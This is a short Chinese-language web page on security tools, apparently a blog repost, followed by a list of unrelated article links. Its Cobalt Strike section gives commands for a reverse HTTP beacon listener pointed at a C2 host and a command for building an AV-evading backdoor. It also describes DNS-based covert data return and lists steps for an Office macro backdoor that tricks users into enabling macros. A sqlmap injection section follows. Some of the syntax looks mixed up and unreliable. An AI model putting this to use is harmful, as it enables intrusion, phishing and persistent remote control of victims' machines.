当前位置: 首页 > news >正文

安全工具配置

news 2025/7/6 9:20:25

3.1 工具使用

3.1.1 CobaltStrike 高级用法

监听器(Listener)配置

- HTTP/HTTPS监听器:

# 配置HTTP监听器(默认端口80) set payload windows/beacon_http/reverse_http set Host 192.168.1.10 set Port 80 exploit -j

- DNS监听器:绕过网络监控,通过DNS协议回传数据(需配置域名解析指向C2服务器)。

后门生成与权限维持

- Windows可执行文件:

bash # 生成免杀后门(使用混淆模板) ./agscript.sh <团队服务器> <用户> <密码> artifact-kit/pe_templates_template.x64.exe

- Office宏后门:

1. 生成宏Payload:Attacks → Packages → Microsoft Office Macro。

2. 插入Word文档,诱导用户启用宏触发上线。

3.1.2 Sqlmap 自动化注入实战

基础命令

# 检测目标是否存在注入  

sqlmap -u "http://target.com/page?id=1" --batch

# 获取数据库名称  

sqlmap -u "http://target.com/page?id=1" --dbs
http://www.dtcms.com/a/202725.html

相关文章:

  • STM32外设应用详解——从基础到高级应用的全面指南
  • 基于NLP技术的客户投诉与需求文本分类方法研究
  • 大语言模型的评估指标
  • 差动讯号(2):奇模与偶模
  • RedissonClient主要功能概述
  • 公路水运安全员C证用途及重要性
  • MySQL:to many connections连接数过多
  • 【数据结构 -- AVL树】用golang实现AVL树
  • 商标撤三要求越来越高,一些注意!
  • 73.矩阵置零
  • 云原生架构下的企业 DevOps 治理实践:挑战、策略与落地路径
  • Git Hooks 和 自动生成 Commit Message
  • mysql的乐观锁与悲观锁
  • VUE3 中的 ResizeObserver 警告彻底解决方案
  • Mysql 中的日期时间函数汇总
  • 喷涂喷漆机器人详解
  • Translational Psychiatry | 注意缺陷多动障碍儿童延迟厌恶的行为与神经功能特征茗创科技茗创科技
  • 互联网大厂面试实录:从内容社区到AIGC的Java全栈技术场景问答
  • 【华为OD-B卷-打印文件 100分(python、java、c++、js、c)】
  • 码钉枪行业2025数据分析报告
  • C++修炼:map和set的使用
  • 频分复用信号在信道中的状态
  • 粤港澳编程题
  • Wan2.1 图生视频 支持批量生成
  • 渐开线少齿差传动学习笔记
  • 【Linux】第二十二章 访问网络附加内存
  • 十大排序算法--快速排序
  • CBCharacteristic:是「特征」还是「数据通道」?
  • 独热编码笔记
  • idea本地debug断点小技巧